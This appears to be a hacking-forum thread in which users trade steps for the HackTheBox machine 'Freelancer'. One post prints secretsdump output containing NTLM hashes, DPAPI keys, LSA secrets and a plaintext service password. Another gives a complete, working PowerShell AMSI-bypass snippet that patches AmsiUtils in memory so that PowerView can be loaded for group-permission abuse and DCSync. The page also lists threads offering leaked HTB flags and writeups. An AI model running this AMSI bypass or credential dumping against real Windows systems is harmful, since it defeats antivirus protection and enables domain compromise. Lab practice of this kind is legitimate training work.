06-03-2024, 11:45 AM
can anyone help in memory.7z analysis? i have completed the box via rbcd, but had some confusion on how you guys solved it (the memory part)
|
HTB - Freelancer
by trevor69000 - Saturday June 1, 2024 at 06:49 PM
|
|
06-03-2024, 11:45 AM
can anyone help in memory.7z analysis? i have completed the box via rbcd, but had some confusion on how you guys solved it (the memory part)
06-03-2024, 11:49 AM
After dumping system sam and security from liza.kazanof. it has unknown user password. but it does not work for any of users. Any Idea how to continue ?
I also mentioned that this password was already mentioned before but its different after # symbol. So maybe everyone has different pass.. impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
Impacket v0.11.0 - Copyright 2023 Fortra
[*]Target system bootKey: 0x9db1404806f026092ec95ba23ead445b
[*]Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:680c12d4ef693a3ae0fcd442c3b5874a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*]Dumping cached domain logon information (domain/username:hash)
[*]Dumping LSA Secrets
[*]$MACHINE.ACC
$MACHINE.ACC:plain_password_hex:1f36a3b5a23441f6054f56f97d29c3312ca75d6d7450912ea81648778b5e540c6f38ab1335f9b27f4c69646359f12f2358d272bc0de36d5a9073b2358f68f1873425130a4b88bd750a55f018f1a83d1108691f4757b92f3f1242147e656fe2e1c38e312d5f26f6d9377cb01a53c38d689a48f4c1fcb5320d06fd6c3184810ba49ec8197a0b14f8e9a06f7a83e68437412e57cfa5bc2aa78a782412c509c139cf2cd85efea4b1ea5cafbb1146bc3eb5431eda9feae2854e25c4d1f357d6dc2844c2b7b86325bdca5985873644bd0b3de57996d8e442cd5996e2206072b8e7e90c621bd4f4f67f52be774a578c2d515d31
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379
[*]DPAPI_SYSTEM
dpapi_machinekey:0xe20295f92e7e0bff2615bed48f0a0be7067e28f2
dpapi_userkey:0xbc3e1b600d881e1867b0bdfe6ec833e9743c07d7
[*]NL$KM
0000 D9 0B 60 A4 72 C3 B6 08 E4 F1 FF 54 62 91 65 66 ..`.r......Tb.ef
0010 DE EE 19 17 58 31 12 CB DF 25 18 D0 36 B0 C1 F4 ....X1...%..6...
0020 1B 96 C3 5F 22 73 F0 D6 B9 81 2F 26 BA 69 6A FD ..._"s..../&.ij.
0030 7F C7 0B 87 71 BE D5 F5 8A 74 B4 3A BD AF DB 71 ....q....t.:...q
NL$KM:d90b60a472c3b608e4f1ff5462916566deee1917583112cbdf2518d036b0c1f41b96c35f2273f0d6b9812f26ba696afd7fc70b8771bed5f58a74b43abdafdb71
[*]_SC_MSSQL$SQLEXPRESS
(Unknown User):v3ryS0l!dP@sswd#34
[*]Cleaning up...
06-03-2024, 12:04 PM
How did you get liza.kazano password?
06-03-2024, 12:09 PM
(06-03-2024, 10:29 AM)imhitt Wrote:(06-03-2024, 06:55 AM)ritualist Wrote: Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck That is commands from PowerView.ps1. You need to import this module into memory to be able to use those commands. But to import that module you need to bypass AMSI first.
06-03-2024, 12:21 PM
(06-03-2024, 12:09 PM)j868K3792 Wrote:(06-03-2024, 10:29 AM)imhitt Wrote:(06-03-2024, 06:55 AM)ritualist Wrote: Sharing my steps after getting lorra shell. Maybe it will help someone and get me unstuck [*]How to bypass it
Ban reason:
Asking for rep is not allowed (Permanent)
06-03-2024, 12:43 PM
(06-03-2024, 12:26 PM)xss_02 Wrote: i have already rooted, Bro how can i get liza password i stuck
Ban reason:
Asking for rep is not allowed (Permanent)
06-03-2024, 01:24 PM
Finally progress.
First execute $mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)And after [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)It should show something like this This script contains malicious content and has been blocked by your antivirus software.Then you have to use AMSI bypass earlier posted in this thread. Copy and paste line by line. $a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)After repeat $mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)And after [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem)And you should not see errors about "antivirus software". At this point you bypassed AMSI. And may continue. Next steps i see you need to upload this file to victim server https://github.com/PowerShellMafia/Power...erView.ps1 Then include this model to powershell by typing Import-Module .\Powerview.ps1And then you should go for add Generic Write to Group https://book.hacktricks.xyz/windows-hard...e-on-group But currently am stuck there...
06-03-2024, 01:26 PM
Guys, who can describe how to bypass AMSI?
The only thing I need is to bypass it, DCSync attack is easy after it. Stuck on it.
06-03-2024, 01:30 PM
(06-03-2024, 01:24 PM)imhitt Wrote: Finally progress. Trying that like 20 times. Everytime "Import-Module : Operation did not complete successfully because the file contains a virus or potentially" unwanted software.
06-03-2024, 01:34 PM
command fror memory analysis any one???
would be helpofull |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 360 | 91,880 |
03-28-2026, 09:28 AM Last Post: |
||
| [FREE] HTB-ProLabs APTLABS Just Flags | 23 | 5,027 |
03-28-2026, 03:30 AM Last Post: |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 87 | 10,249 |
03-27-2026, 07:22 PM Last Post: |
||
| HTB Eloquia User and Root Flags - Insane Box | 13 | 3,002 |
03-27-2026, 06:14 PM Last Post: |
||
| HTB - ALL Challenges you Stuck in | 2 | 3,290 |
03-27-2026, 04:24 PM Last Post: |
||